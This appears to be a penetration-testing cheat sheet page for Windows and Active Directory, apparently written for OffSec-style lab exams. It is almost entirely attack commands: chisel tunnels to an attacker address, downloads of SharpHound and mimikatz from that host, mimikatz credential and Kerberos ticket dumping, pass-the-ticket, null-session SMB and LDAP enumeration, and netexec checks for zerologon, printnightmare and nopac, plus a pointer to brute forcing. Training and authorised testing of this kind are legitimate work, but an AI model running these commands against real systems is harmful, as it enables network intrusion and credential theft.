Checklist

ls C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\

Do this for all users on the machine

Also run winPEAS to make sure no sensitive files are missed

.\chisel.exe client 192.168.45.x:8888 R:9999:socks
.\chisel.exe client 192.168.45.x:8888 8080:127.0.0.1:80
curl 192.168.45.x/SharpHound.exe -o SharpHound.exe
.\SharpHound.exe -c all
curl 192.168.45.x/mimikatz.exe -o mimikatz.exe
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::tickets /export" "exit"
dir *.kirbi
kerberos::ptt <ticket>
enum4linux <IP>
enum4linux -u  -p -a -A <IP>
nmap -p 389 --script="ldap* and not brute" -Pn <IP>
 ldapsearch -H ldap://dc.offsec.com -D '' -w '' -b "dc=offsec,dc=com"
 ldapsearch -H ldap://dc.offsec.com -D '' -w '' -b "dc=offsec,dc=com" | grep -i description
netexec smb <IP> -u '' -p '' --shares
netexec smb <IP> -u '' -p '' --users
netxec ldap <IP> -u '' -p '' --password-not-required --admin-count --users --groups
netexec smb <IP> -u '' -p '' --rid-brute
netexec smb <IP> -u '' -p '' -M spider_plus
netexec smb <IP> -u '' -p '' -M printnightmare
netexec smb <IP> -u '' -p '' -M gpp_password
netexec smb <IP> -u '' -p '' -M spooler
netexec smb <IP> -u '' -p '' -M nopac
netexec smb <IP> -u '' -p '' -M zerologon

Try sorts of user:user combos, as-rep roasting, bruteforcing etc

PreviousMiscNextInitial Attack Strategy

Last updated